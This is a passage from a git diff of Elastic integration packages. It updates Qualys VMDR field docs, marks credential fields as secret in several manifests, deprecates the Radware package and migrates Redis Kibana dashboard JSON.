-| qualys_vmdr.asset_host_detection.list.qid | | keyword | -| qualys_vmdr.asset_host_detection.list.results | | keyword | -| qualys_vmdr.asset_host_detection.list.service | | keyword | -| qualys_vmdr.asset_host_detection.list.severity | | long | -| qualys_vmdr.asset_host_detection.list.ssl | | keyword | -| qualys_vmdr.asset_host_detection.list.status | | keyword | -| qualys_vmdr.asset_host_detection.list.times.found | | long | -| qualys_vmdr.asset_host_detection.list.times.reopened | | long | -| qualys_vmdr.asset_host_detection.list.type | | keyword | | qualys_vmdr.asset_host_detection.metadata.azure.attribute.last.error.date | | date | | qualys_vmdr.asset_host_detection.metadata.azure.attribute.last.error.value | | keyword | | qualys_vmdr.asset_host_detection.metadata.azure.attribute.last.status | | keyword | @@ -277,6 +273,38 @@ An example event for `asset_host_detection` looks as following: | qualys_vmdr.asset_host_detection.tags.id | | keyword | | qualys_vmdr.asset_host_detection.tags.name | | keyword | | qualys_vmdr.asset_host_detection.tracking_method | | keyword | +| qualys_vmdr.asset_host_detection.vulnerability.affect.exploitable_config | | keyword | +| qualys_vmdr.asset_host_detection.vulnerability.affect.running.kernel | | keyword | +| qualys_vmdr.asset_host_detection.vulnerability.affect.running.service | | keyword | +| qualys_vmdr.asset_host_detection.vulnerability.asset_cve | | keyword | +| qualys_vmdr.asset_host_detection.vulnerability.first.found_datetime | | date | +| qualys_vmdr.asset_host_detection.vulnerability.first.reopened_datetime | | date | +| qualys_vmdr.asset_host_detection.vulnerability.fqdn | | keyword | +| qualys_vmdr.asset_host_detection.vulnerability.instance | | keyword | +| qualys_vmdr.asset_host_detection.vulnerability.is_disabled | | boolean | +| qualys_vmdr.asset_host_detection.vulnerability.is_ignored | | boolean | +| qualys_vmdr.asset_host_detection.vulnerability.last.fixed_datetime | | date | +| qualys_vmdr.asset_host_detection.vulnerability.last.found_datetime | | date | +| qualys_vmdr.asset_host_detection.vulnerability.last.processed_datetime | | date | +| qualys_vmdr.asset_host_detection.vulnerability.last.reopened_datetime | | date | +| qualys_vmdr.asset_host_detection.vulnerability.last.test_datetime | | date | +| qualys_vmdr.asset_host_detection.vulnerability.last.update_datetime | | date | +| qualys_vmdr.asset_host_detection.vulnerability.port | | long | +| qualys_vmdr.asset_host_detection.vulnerability.protocol | | keyword | +| qualys_vmdr.asset_host_detection.vulnerability.qds.severity | | keyword | +| qualys_vmdr.asset_host_detection.vulnerability.qds.text | | keyword | +| qualys_vmdr.asset_host_detection.vulnerability.qds_factors.name | | keyword | +| qualys_vmdr.asset_host_detection.vulnerability.qds_factors.text | | keyword | +| qualys_vmdr.asset_host_detection.vulnerability.qid | | keyword | +| qualys_vmdr.asset_host_detection.vulnerability.results | | keyword | +| qualys_vmdr.asset_host_detection.vulnerability.service | | keyword | +| qualys_vmdr.asset_host_detection.vulnerability.severity | | long | +| qualys_vmdr.asset_host_detection.vulnerability.ssl | | keyword | +| qualys_vmdr.asset_host_detection.vulnerability.status | | keyword | +| qualys_vmdr.asset_host_detection.vulnerability.times.found | | long | +| qualys_vmdr.asset_host_detection.vulnerability.times.reopened | | long | +| qualys_vmdr.asset_host_detection.vulnerability.type | | keyword | +| qualys_vmdr.asset_host_detection.vulnerability.unique_vuln_id | | keyword | | tags | User defined tags. | keyword | @@ -292,11 +320,11 @@ An example event for `knowledge_base` looks as following: { "@timestamp": "2023-06-29T12:20:46.000Z", "agent": { - "ephemeral_id": "d0eb176e-bad7-47fa-9547-c1854ad7ca2d", - "id": "98ba96f5-b452-4fc7-8f5a-3d37a634ce61", + "ephemeral_id": "2680cdd8-c261-48cd-b70d-b958f911b86a", + "id": "339b7770-4966-47a8-bc07-60e4a5c83116", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.0" + "version": "8.12.1" }, "data_stream": { "dataset": "qualys_vmdr.knowledge_base", @@ -307,9 +335,9 @@ An example event for `knowledge_base` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "98ba96f5-b452-4fc7-8f5a-3d37a634ce61", + "id": "339b7770-4966-47a8-bc07-60e4a5c83116", "snapshot": false, - "version": "8.9.0" + "version": "8.12.1" }, "event": { "agent_id_status": "verified", @@ -318,7 +346,7 @@ An example event for `knowledge_base` looks as following: ], "dataset": "qualys_vmdr.knowledge_base", "id": "11830", - "ingested": "2023-11-14T21:17:15Z", + "ingested": "2024-03-17T23:42:53Z", "kind": "alert", "type": [ "info" @@ -330,6 +358,10 @@ An example event for `knowledge_base` looks as following: "qualys_vmdr": { "knowledge_base": { "category": "CGI", + "cve_list": [ + "CVE-2022-31629", + "CVE-2022-31628" + ], "discovery": { "remote": 1 }, @@ -360,6 +392,10 @@ An example event for `knowledge_base` looks as following: "category": [ "CGI" ], + "id": [ + "CVE-2022-31629", + "CVE-2022-31628" + ], "severity": "Medium" } } @@ -399,8 +435,7 @@ An example event for `knowledge_base` looks as following: | qualys_vmdr.knowledge_base.correlation.malware.src.list.info.rating | | keyword | | qualys_vmdr.knowledge_base.correlation.malware.src.list.info.type | | keyword | | qualys_vmdr.knowledge_base.correlation.malware.src.name | | keyword | -| qualys_vmdr.knowledge_base.cve_list.id | | keyword | -| qualys_vmdr.knowledge_base.cve_list.url | | keyword | +| qualys_vmdr.knowledge_base.cve_list | | keyword | | qualys_vmdr.knowledge_base.cvss.access.complexity | | keyword | | qualys_vmdr.knowledge_base.cvss.access.vector | | keyword | | qualys_vmdr.knowledge_base.cvss.authentication | | keyword | diff --git a/packages/qualys_vmdr/manifest.yml b/packages/qualys_vmdr/manifest.yml index 0548229fd89..bdfd12b7976 100644 --- a/packages/qualys_vmdr/manifest.yml +++ b/packages/qualys_vmdr/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: qualys_vmdr title: Qualys VMDR -version: "1.0.1" +version: "3.0.0" description: Collect data from Qualys VMDR platform with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - vulnerability_management conditions: kibana: - version: ^8.9.0 + version: ^8.12.0 elastic: subscription: basic screenshots: @@ -49,6 +49,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: proxy_url type: text title: Proxy URL diff --git a/packages/rabbitmq/changelog.yml b/packages/rabbitmq/changelog.yml index 7f52f2fa629..691a1388cd4 100644 --- a/packages/rabbitmq/changelog.yml +++ b/packages/rabbitmq/changelog.yml @@ -1,3 +1,18 @@ +- version: 1.13.0 + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: 1.12.1 + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: 1.12.0 + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 - version: 1.11.0 changes: - description: Update the package format_version to 3.0.0. diff --git a/packages/rabbitmq/manifest.yml b/packages/rabbitmq/manifest.yml index 729a9ce3658..cdce65aa859 100644 --- a/packages/rabbitmq/manifest.yml +++ b/packages/rabbitmq/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: rabbitmq title: RabbitMQ Logs and Metrics -version: "1.11.0" +version: "1.13.0" description: Collect and parse logs from RabbitMQ servers with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - observability conditions: kibana: - version: "^8.8.0" + version: "^8.12.0" elastic: subscription: basic screenshots: @@ -60,6 +60,7 @@ policy_templates: - name: password type: password title: Password + secret: true multi: false required: false show_user: false diff --git a/packages/radware/_dev/deploy/docker/docker-compose.yml b/packages/radware/_dev/deploy/docker/docker-compose.yml index fd6532ff8ec..4472d229d4e 100644 --- a/packages/radware/_dev/deploy/docker/docker-compose.yml +++ b/packages/radware/_dev/deploy/docker/docker-compose.yml @@ -11,10 +11,10 @@ services: volumes: - ./sample_logs:/sample_logs:ro entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9535 -p=udp /sample_logs/radware-defensepro-*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9535 -p=udp /sample_logs/radware-defensepro-*.log radware-defensepro-tcp: image: akroh/stream:v0.2.0 volumes: - ./sample_logs:/sample_logs:ro entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9535 -p=tcp /sample_logs/radware-defensepro-*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9535 -p=tcp /sample_logs/radware-defensepro-*.log diff --git a/packages/radware/changelog.yml b/packages/radware/changelog.yml index 81ecc80a4cb..7a6da86e686 100644 --- a/packages/radware/changelog.yml +++ b/packages/radware/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.19.0" + changes: + - description: Deprecate package. + type: enhancement + link: https://github.com/elastic/integrations/pull/9074 - version: "0.18.2" changes: - description: Changed owners diff --git a/packages/radware/manifest.yml b/packages/radware/manifest.yml index 1a700702600..c26cbda4216 100644 --- a/packages/radware/manifest.yml +++ b/packages/radware/manifest.yml @@ -1,12 +1,12 @@ format_version: 2.7.0 name: radware -title: Radware DefensePro Logs -version: "0.18.2" -description: Collect defensePro logs from Radware devices with Elastic Agent. +title: Radware DefensePro Logs (Deprecated) +version: "0.19.0" +description: Deprecated. Radware DefensePro Logs is no longer supported. categories: ["security"] type: integration conditions: - kibana.version: "^7.14.0 || ^8.0.0" + kibana.version: "^8.8.0" policy_templates: - name: defensepro title: Radware DefensePro diff --git a/packages/rapid7_insightvm/changelog.yml b/packages/rapid7_insightvm/changelog.yml index e317c5913ea..4bfc5cd9d6b 100644 --- a/packages/rapid7_insightvm/changelog.yml +++ b/packages/rapid7_insightvm/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.9.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9128 - version: "1.8.2" changes: - description: Changed owners diff --git a/packages/rapid7_insightvm/manifest.yml b/packages/rapid7_insightvm/manifest.yml index 24b40573615..18678963c25 100644 --- a/packages/rapid7_insightvm/manifest.yml +++ b/packages/rapid7_insightvm/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: rapid7_insightvm title: Rapid7 InsightVM -version: "1.8.2" +version: "1.9.0" source: license: "Elastic-2.0" description: Collect logs from Rapid7 InsightVM with Elastic Agent. @@ -11,7 +11,7 @@ categories: - vulnerability_management conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 elastic: subscription: "basic" screenshots: @@ -58,6 +58,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: proxy_url type: text title: Proxy URL diff --git a/packages/redis/changelog.yml b/packages/redis/changelog.yml index 6c6295a19ba..9615577274e 100644 --- a/packages/redis/changelog.yml +++ b/packages/redis/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.14.0" + changes: + - description: Enable 'secret' for the sensitive fields. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 +- version: "1.13.1" + changes: + - description: Inline "by reference" visualizations + type: enhancement + link: https://github.com/elastic/integrations/pull/9053 - version: "1.13.0" changes: - description: Update value format of "Top Slowest command" visualization. diff --git a/packages/redis/data_stream/slowlog/manifest.yml b/packages/redis/data_stream/slowlog/manifest.yml index 656954314ae..48592b5ddec 100644 --- a/packages/redis/data_stream/slowlog/manifest.yml +++ b/packages/redis/data_stream/slowlog/manifest.yml @@ -14,6 +14,7 @@ streams: - name: password type: password title: Password + secret: true multi: false required: false show_user: false diff --git a/packages/redis/kibana/dashboard/redis-28969190-0511-11e9-9c60-d582a238e2c5.json b/packages/redis/kibana/dashboard/redis-28969190-0511-11e9-9c60-d582a238e2c5.json index d872f81e2d6..22ce123c4c9 100644 --- a/packages/redis/kibana/dashboard/redis-28969190-0511-11e9-9c60-d582a238e2c5.json +++ b/packages/redis/kibana/dashboard/redis-28969190-0511-11e9-9c60-d582a238e2c5.json @@ -1,8 +1,19 @@ { + "id": "redis-28969190-0511-11e9-9c60-d582a238e2c5", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:24:55.598Z", + "created_at": "2024-01-22T13:24:55.598Z", + "version": "WzEwNywxXQ==", "attributes": { "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", "controlStyle": "oneLine", + "chainingSystem": "HIERARCHICAL", "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", "panelsJSON": "{\"88495d21-6261-4c60-8de6-e9aa688b2085\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"title\":\"Keyspace\",\"fieldName\":\"redis.keyspace.id\",\"id\":\"88495d21-6261-4c60-8de6-e9aa688b2085\",\"selectedOptions\":[\"db0\",\"db1\"],\"enhancements\":{}}}}" }, @@ -59,6 +70,16 @@ }, "panelsJSON": [ { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "79fa7446-f3ce-466c-a4b5-bd4fde483e5d", + "w": 12, + "x": 0, + "y": 0 + }, + "panelIndex": "79fa7446-f3ce-466c-a4b5-bd4fde483e5d", "embeddableConfig": { "attributes": { "references": [ @@ -70,7 +91,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "9d7816a6-2ec8-4b54-aecf-ae00937afd79": { "columnOrder": [ @@ -190,21 +211,22 @@ "visualizationType": "lnsXY" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Keys by type" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 15, - "i": "79fa7446-f3ce-466c-a4b5-bd4fde483e5d", - "w": 12, - "x": 0, + "i": "3199303d-19cf-430f-ab40-ac73f0ec9ea2", + "w": 36, + "x": 12, "y": 0 }, - "panelIndex": "79fa7446-f3ce-466c-a4b5-bd4fde483e5d", - "title": "Keys by type", - "type": "lens", - "version": "8.3.0" - }, - { + "panelIndex": "3199303d-19cf-430f-ab40-ac73f0ec9ea2", "embeddableConfig": { "attributes": { "references": [ @@ -221,7 +243,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "ab5b97a3-2883-46a9-8740-a9e19a13bc0d": { "columnOrder": [ @@ -369,21 +391,22 @@ "visualizationType": "lnsXY" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Lists length" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 15, - "i": "3199303d-19cf-430f-ab40-ac73f0ec9ea2", - "w": 36, - "x": 12, - "y": 0 + "i": "161bf113-0b65-4f2c-ad1c-64f06c8b2344", + "w": 24, + "x": 0, + "y": 15 }, - "panelIndex": "3199303d-19cf-430f-ab40-ac73f0ec9ea2", - "title": "Lists length", - "type": "lens", - "version": "8.3.0" - }, - { + "panelIndex": "161bf113-0b65-4f2c-ad1c-64f06c8b2344", "embeddableConfig": { "attributes": { "references": [ @@ -400,7 +423,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "a99f131f-7844-46d3-801d-3023f3eb35d2": { "columnOrder": [ @@ -535,21 +558,22 @@ "visualizationType": "lnsXY" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Average size of string keys" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 15, - "i": "161bf113-0b65-4f2c-ad1c-64f06c8b2344", + "i": "375cffab-4569-45e7-8848-c4464789a543", "w": 24, - "x": 0, + "x": 24, "y": 15 }, - "panelIndex": "161bf113-0b65-4f2c-ad1c-64f06c8b2344", - "title": "Average size of string keys", - "type": "lens", - "version": "8.3.0" - }, - { + "panelIndex": "375cffab-4569-45e7-8848-c4464789a543", "embeddableConfig": { "attributes": { "references": [ @@ -566,7 +590,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "93604465-9546-445d-8756-e2fe12469522": { "columnOrder": [ @@ -716,30 +740,16 @@ "visualizationType": "lnsXY" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, - "gridData": { - "h": 15, - "i": "375cffab-4569-45e7-8848-c4464789a543", - "w": 24, - "x": 24, - "y": 15 - }, - "panelIndex": "375cffab-4569-45e7-8848-c4464789a543", - "title": "Average keys TTL", - "type": "lens", - "version": "8.3.0" + "title": "Average keys TTL" } ], "timeRestore": false, "title": "[Metrics Redis] Keys", "version": 1 }, - "coreMigrationVersion": "8.3.0", - "id": "redis-28969190-0511-11e9-9c60-d582a238e2c5", - "migrationVersion": { - "dashboard": "8.3.0" - }, "references": [ { "id": "metrics-*", @@ -787,5 +797,7 @@ "type": "index-pattern" } ], - "type": "dashboard" + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/redis/kibana/dashboard/redis-7fea2930-478e-11e7-b1f0-cb29bac6bf8b.json b/packages/redis/kibana/dashboard/redis-7fea2930-478e-11e7-b1f0-cb29bac6bf8b.json index 7059e36e338..07717123064 100644 --- a/packages/redis/kibana/dashboard/redis-7fea2930-478e-11e7-b1f0-cb29bac6bf8b.json +++ b/packages/redis/kibana/dashboard/redis-7fea2930-478e-11e7-b1f0-cb29bac6bf8b.json @@ -1,4 +1,15 @@ { + "id": "redis-7fea2930-478e-11e7-b1f0-cb29bac6bf8b", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:24:55.598Z", + "created_at": "2024-01-22T13:24:55.598Z", + "version": "WzEwOCwxXQ==", "attributes": { "description": "Overview dashboard for the FIlebeat Redis integration", "kibanaSavedObjectMeta": { @@ -32,7 +43,45 @@ "@timestamp", "desc" ] - ] + ], + "attributes": { + "columns": [ + "host.name", + "log.level", + "redis.log.role", + "message" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": "{\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\",\"key\":\"data_stream.dataset\",\"negate\":false,\"params\":{\"query\":\"redis.log\"},\"type\":\"phrase\"},\"query\":{\"match_phrase\":{\"data_stream.dataset\":\"redis.log\"}}}],\"highlightAll\":true,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"version\":true}" + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "Logs [Logs Redis]", + "version": 1, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", + "type": "index-pattern" + } + ] + } }, "gridData": { "h": 16, @@ -42,9 +91,8 @@ "y": 30 }, "panelIndex": "4", - "panelRefName": "panel_4", "type": "search", - "version": "8.10.2" + "version": "7.9.3" }, { "embeddableConfig": { @@ -55,7 +103,35 @@ "redis.slowlog.key" ], "enhancements": {}, - "sort": [] + "sort": [], + "attributes": { + "columns": [ + "host.name", + "message", + "redis.slowlog.duration.us", + "redis.slowlog.key" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": "{\"filter\":[],\"highlightAll\":true,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"query\":{\"language\":\"kuery\",\"query\":\"data_stream.dataset:redis.slowlog\"},\"version\":true}" + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "Slow logs [Logs Redis]", + "version": 1, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + } + ] + } }, "gridData": { "h": 16, @@ -65,9 +141,8 @@ "y": 0 }, "panelIndex": "6", - "panelRefName": "panel_6", "type": "search", - "version": "8.10.2" + "version": "7.9.3" }, { "embeddableConfig": { @@ -479,21 +554,7 @@ "title": "[Logs Redis] Overview", "version": 1 }, - "coreMigrationVersion": "8.8.0", - "created_at": "2023-10-23T06:52:58.334Z", - "id": "redis-7fea2930-478e-11e7-b1f0-cb29bac6bf8b", - "managed": false, "references": [ - { - "id": "redis-73613570-4791-11e7-be88-2ddb32f3df97", - "name": "4:panel_4", - "type": "search" - }, - { - "id": "redis-0ab87b80-478e-11e7-b1f0-cb29bac6bf8b", - "name": "6:panel_6", - "type": "search" - }, { "id": "logs-*", "name": "048af531-a2d5-4a14-b7d2-6156dce83cbc:indexpattern-datasource-layer-c0de1034-34c9-4f6a-b525-e39bd578cd2f", @@ -508,8 +569,29 @@ "id": "logs-*", "name": "5150d808-cfa0-4a30-ab6f-e9517fa2ceec:indexpattern-datasource-layer-ebb70b66-e024-4a14-b179-d15c72b605bf", "type": "index-pattern" + }, + { + "type": "index-pattern", + "name": "4:kibanaSavedObjectMeta.searchSourceJSON.index", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "4:kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "4:kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "6:kibanaSavedObjectMeta.searchSourceJSON.index", + "id": "logs-*" } ], - "type": "dashboard", + "managed": false, + "coreMigrationVersion": "8.8.0", "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/redis/kibana/dashboard/redis-AV4YjZ5pux-M-tCAunxK.json b/packages/redis/kibana/dashboard/redis-AV4YjZ5pux-M-tCAunxK.json index d4f7d5a1525..4d2ff1f06b5 100644 --- a/packages/redis/kibana/dashboard/redis-AV4YjZ5pux-M-tCAunxK.json +++ b/packages/redis/kibana/dashboard/redis-AV4YjZ5pux-M-tCAunxK.json @@ -1,4 +1,15 @@ { + "id": "redis-AV4YjZ5pux-M-tCAunxK", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:24:55.598Z", + "created_at": "2024-01-22T13:24:55.598Z", + "version": "WzEwOSwxXQ==", "attributes": { "description": "Overview of Redis server metrics", "hits": 0, @@ -18,6 +29,16 @@ }, "panelsJSON": [ { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "9587ad36-13de-4de0-8586-16065d55d029", + "w": 12, + "x": 0, + "y": 0 + }, + "panelIndex": "9587ad36-13de-4de0-8586-16065d55d029", "embeddableConfig": { "attributes": { "references": [ @@ -34,7 +55,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "42f14593-5da1-4fb7-adbc-aeb5e9a4e2cc": { "columnOrder": [ @@ -72,23 +93,24 @@ }, "title": "", "type": "lens", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, - "enhancements": {} + "enhancements": {}, + "type": "lens" }, + "title": "Clients [Metrics Redis]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 14, - "i": "9587ad36-13de-4de0-8586-16065d55d029", - "w": 12, - "x": 0, + "i": "452a1f6f-4931-4391-88bf-dfd23334b77b", + "w": 20, + "x": 12, "y": 0 }, - "panelIndex": "9587ad36-13de-4de0-8586-16065d55d029", - "title": "Clients [Metrics Redis]", - "type": "lens", - "version": "8.3.0" - }, - { + "panelIndex": "452a1f6f-4931-4391-88bf-dfd23334b77b", "embeddableConfig": { "attributes": { "references": [ @@ -105,7 +127,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "663fc5eb-ba63-4cb6-b9af-d996c9496392": { "columnOrder": [ @@ -208,21 +230,22 @@ "type": "lens", "visualizationType": "lnsXY" }, - "enhancements": {} + "enhancements": {}, + "type": "lens" }, + "title": "Connected clients [Metrics Redis]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 14, - "i": "452a1f6f-4931-4391-88bf-dfd23334b77b", - "w": 20, - "x": 12, + "i": "6ceb010f-3be5-402d-a4cf-42f52a01d0db", + "w": 16, + "x": 32, "y": 0 }, - "panelIndex": "452a1f6f-4931-4391-88bf-dfd23334b77b", - "title": "Connected clients [Metrics Redis]", - "type": "lens", - "version": "8.3.0" - }, - { + "panelIndex": "6ceb010f-3be5-402d-a4cf-42f52a01d0db", "embeddableConfig": { "attributes": { "references": [ @@ -234,7 +257,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "4b781053-c878-4b17-9517-9dbd0482b634": { "columnOrder": [ @@ -343,21 +366,22 @@ "type": "lens", "visualizationType": "lnsXY" }, - "enhancements": {} + "enhancements": {}, + "type": "lens" }, - "gridData": { - "h": 14, - "i": "6ceb010f-3be5-402d-a4cf-42f52a01d0db", - "w": 16, - "x": 32, - "y": 0 - }, - "panelIndex": "6ceb010f-3be5-402d-a4cf-42f52a01d0db", - "title": "Keyspaces [Metrics Redis]", - "type": "lens", - "version": "8.3.0" + "title": "Keyspaces [Metrics Redis]" }, { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 8, + "i": "e38aacc7-f856-4306-86d2-3746d0143d6a", + "w": 48, + "x": 0, + "y": 14 + }, + "panelIndex": "e38aacc7-f856-4306-86d2-3746d0143d6a", "embeddableConfig": { "attributes": { "references": [ @@ -369,7 +393,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "0af489b3-738e-40c0-9ae4-43dd70bf9fed": { "columnOrder": [ @@ -518,21 +542,22 @@ "type": "lens", "visualizationType": "lnsDatatable" }, - "enhancements": {} + "enhancements": {}, + "type": "lens" }, + "title": "Hosts [Metrics Redis]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 8, - "i": "e38aacc7-f856-4306-86d2-3746d0143d6a", - "w": 48, + "i": "e59f5a8f-6f47-471c-bf7c-96d6eab6baf3", + "w": 16, "x": 0, - "y": 14 + "y": 22 }, - "panelIndex": "e38aacc7-f856-4306-86d2-3746d0143d6a", - "title": "Hosts [Metrics Redis]", - "type": "lens", - "version": "8.3.0" - }, - { + "panelIndex": "e59f5a8f-6f47-471c-bf7c-96d6eab6baf3", "embeddableConfig": { "attributes": { "references": [ @@ -549,7 +574,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "495b0b3d-5f1c-49b0-ac9b-788f6f4d2b06": { "columnOrder": [ @@ -600,16 +625,18 @@ "layers": [ { "categoryDisplay": "default", - "groups": [ - "d32bf426-f3bf-43f9-a1f6-825c2ac9cd5a" - ], "layerId": "495b0b3d-5f1c-49b0-ac9b-788f6f4d2b06", "layerType": "data", "legendDisplay": "show", "legendSize": "auto", - "metric": "3996a38e-2cff-4888-b0cc-234ec8debdf8", "nestedLegend": false, - "numberDisplay": "percent" + "numberDisplay": "percent", + "primaryGroups": [ + "d32bf426-f3bf-43f9-a1f6-825c2ac9cd5a" + ], + "metrics": [ + "3996a38e-2cff-4888-b0cc-234ec8debdf8" + ] } ], "palette": { @@ -623,21 +650,22 @@ "type": "lens", "visualizationType": "lnsPie" }, - "enhancements": {} + "enhancements": {}, + "type": "lens" }, + "title": "Server Versions [Metrics Redis]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 8, - "i": "e59f5a8f-6f47-471c-bf7c-96d6eab6baf3", + "i": "989efbbc-7d45-466c-8bb3-9322a6fa6a46", "w": 16, - "x": 0, + "x": 16, "y": 22 }, - "panelIndex": "e59f5a8f-6f47-471c-bf7c-96d6eab6baf3", - "title": "Server Versions [Metrics Redis]", - "type": "lens", - "version": "8.3.0" - }, - { + "panelIndex": "989efbbc-7d45-466c-8bb3-9322a6fa6a46", "embeddableConfig": { "attributes": { "references": [ @@ -654,7 +682,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "88f523d4-adf4-423a-9a09-a6ae74f410ff": { "columnOrder": [ @@ -705,16 +733,18 @@ "layers": [ { "categoryDisplay": "default", - "groups": [ - "a60e9838-ac8c-440d-b42f-07cc81d2694c" - ], "layerId": "88f523d4-adf4-423a-9a09-a6ae74f410ff", "layerType": "data", "legendDisplay": "show", "legendSize": "auto", - "metric": "3f54a1a9-ff71-44a3-80f5-f16d7db12c58", "nestedLegend": false, - "numberDisplay": "percent" + "numberDisplay": "percent", + "primaryGroups": [ + "a60e9838-ac8c-440d-b42f-07cc81d2694c" + ], + "metrics": [ + "3f54a1a9-ff71-44a3-80f5-f16d7db12c58" + ] } ], "palette": { @@ -728,21 +758,22 @@ "type": "lens", "visualizationType": "lnsPie" }, - "enhancements": {} + "enhancements": {}, + "type": "lens" }, + "title": "Server mode [Metrics Redis]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 8, - "i": "989efbbc-7d45-466c-8bb3-9322a6fa6a46", + "i": "eed90cad-e313-4af5-b26b-965cfc02ea24", "w": 16, - "x": 16, + "x": 32, "y": 22 }, - "panelIndex": "989efbbc-7d45-466c-8bb3-9322a6fa6a46", - "title": "Server mode [Metrics Redis]", - "type": "lens", - "version": "8.3.0" - }, - { + "panelIndex": "eed90cad-e313-4af5-b26b-965cfc02ea24", "embeddableConfig": { "attributes": { "references": [ 